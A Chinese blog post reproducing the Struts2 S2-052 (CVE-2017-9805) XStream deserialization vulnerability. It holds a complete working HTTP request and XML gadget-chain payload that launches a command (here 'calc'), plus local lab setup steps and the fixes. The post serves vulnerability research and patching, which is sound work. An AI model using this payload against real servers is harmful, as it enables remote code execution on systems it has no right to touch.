s2-052复现

发表于 | 分类于 |

struts2这两天又出新漏洞了,漏洞为s2-052,这里是对漏洞的复现。只用于个人研究

s2-052漏洞介绍

问题出现在struts2-rest-plugin插件XStreamHandler处理器中的toObject()方法,其中未对传入的值进行任何限制,在使用XStream反
漏洞编号:CVE-2017-9805(S2-052)
影响版本:Struts 2.5 - Struts 2.5.12

s2-052 POC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
POST /struts2-rest-showcase/orders/3;jsessionid=A82EAA2857A1FFAF61FF24A1FBB4A3C7 HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/xml
Content-Length: 2365
Referer: http://127.0.0.1:8080/struts2-rest-showcase/orders/3/edit
Cookie: JSESSIONID=A82EAA2857A1FFAF61FF24A1FBB4A3C7
Connection: close
Upgrade-Insecure-Requests: 1
<map>
  <entry>
    <jdk.nashorn.internal.objects.NativeString>
      <flags>0</flags>
      <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
        <dataHandler>
          <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
            <is class="javax.crypto.CipherInputStream">
              <cipher class="javax.crypto.NullCipher">
                <initialized>false</initialized>
                <opmode>0</opmode>
                <serviceIterator class="javax.imageio.spi.FilterIterator">
                  <iter class="javax.imageio.spi.FilterIterator">
                    <iter class="java.util.Collections$EmptyIterator"/>
                    <next class="java.lang.ProcessBuilder">
                      <command>
                        <string>calc</string>
                      </command>
                      <redirectErrorStream>false</redirectErrorStream>
                    </next>
                  </iter>
                  <filter class="javax.imageio.ImageIO$ContainsFilter">
                    <method>
                      <class>java.lang.ProcessBuilder</class>
                      <name>start</name>
                      <parameter-types/>
                    </method>
                    <name>foo</name>
                  </filter>
                  <next class="string">foo</next>
                </serviceIterator>
                <lock/>
              </cipher>
              <input class="java.lang.ProcessBuilder$NullInputStream"/>
              <ibuffer></ibuffer>
              <done>false</done>
              <ostart>0</ostart>
              <ofinish>0</ofinish>
              <closed>false</closed>
            </is>
            <consumed>false</consumed>
          </dataSource>
          <transferFlavors/>
        </dataHandler>
        <dataLen>0</dataLen>
      </value>
    </jdk.nashorn.internal.objects.NativeString>
    <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
  </entry>
  <entry>
    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
  </entry>
</map>

注意:执行命令的地方在于command内,这里我是在windows上执行的,在其他系统中执行写出相对应的就可以了

1
2
3
4
5
<command>
<string>
calc
</string>
</command>

s2-052漏洞复现

安装Java

下载JDK

在官网上下载JDK http://www.oracle.com/technetwork/java/javase/downloads/jdk8-downloads-2133151.html
我是在windows上搭建的所以,下载windows版本的

配置环境变量

1 新建系统变量:
变量名:JAVA_HOME
变量值:你的JDK安装目录
2 再新建系统变量:
变量名:CLASSPATH
值:.;%JAVA_HOME%\lib;%JAVA_HOME%\lib\dt.jar;%JAVA_HOME%\lib\tools.jar;%TOMCAT_HOME%\BIN
注意:前面的点号
3 修改PATH变量
变量名:PATH
值:;%JAVA_HOME%\bin;%JAVA_HOME%\jre\bin;
注意:前面的分号,将此值添加到,path变量值的最后面

安装Tomcat

下载Tomcat

在官网上下载Tomcat http://tomcat.apache.org/download-90.cgi
下载你需要的版本
下载完成以后解压到你想解压的目录就可以了

配置Tomcat的环境变量

新建Tomcat环境变量
变量名:TOMCAT_HOME
变量值:你的TOMCAT所在目录

启动Tomcat

打开bin文件夹—双击startup.bat;系统会打开一个dos窗口,即启动成功;
如果未打开dos窗口或者dos窗口一闪而过,可能是jdk的配置出错,请安装上面的进行注意检查

访问:http://127.0.0.1:8080
注意:若要修改tomcat端口,可打开/Library/Tomcat/conf/server.xml文件,修改8080端口。

下载受影响的struts2版本

1.从struts2的官网下载最后受影响的版本struts-2.5.12,地址: http://archive.apache.org/dist/struts/2.5.12/struts-2.5.12-apps.zip 注意下载struts-2.5.12-apps即可,不需要下载struts-2.5.12-all.zip。不然struts-2.5.12-all.zip中包含很多其他的东西,可以看到lib目录下有很多jar包。
2.拿到struts-2.5.12-apps之后,将其中的app目录下的struts2-rest-showcase.war文件放到webapps目录下,然后设置一下conf/server.xml文件即可。
3.这里把appBase设置为webapps目录,然后unpackWARs设置为true,这样就会自动解包xxx.war,autoDeploy也设置为true(热部署?) 然后就可以浏览器访问了。 直接输入 http://127.0.0.1:8080/struts2-rest-showcase/ 会跳转,然后出现下面的页面

开始复现

进入编辑页面

设置抓包,点击提交按钮


修改Content-Type和POST提交的数据

可以看到计算器已经调用出来

修补方法

1.升级Struts到2.5.13最新版本。
2.在不使用时删除Struts REST插件,或仅限于服务器普通页面和JSONs

python验证脚本

https://github.com/ysrc/xunfeng/commit/f9ae69fe176c8bca622831e126cd94414ebe26f6?from=timeline&isappinstalled=0


-------------本文结束感谢您的阅读-------------


本文标题:s2-052复现

文章作者:Y-HKL

发布时间:2017年09月08日 - 03:09

最后更新:2017年09月08日 - 04:09

原始链接:http://y-hkl.top/2017/09/08/s2-052复现/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。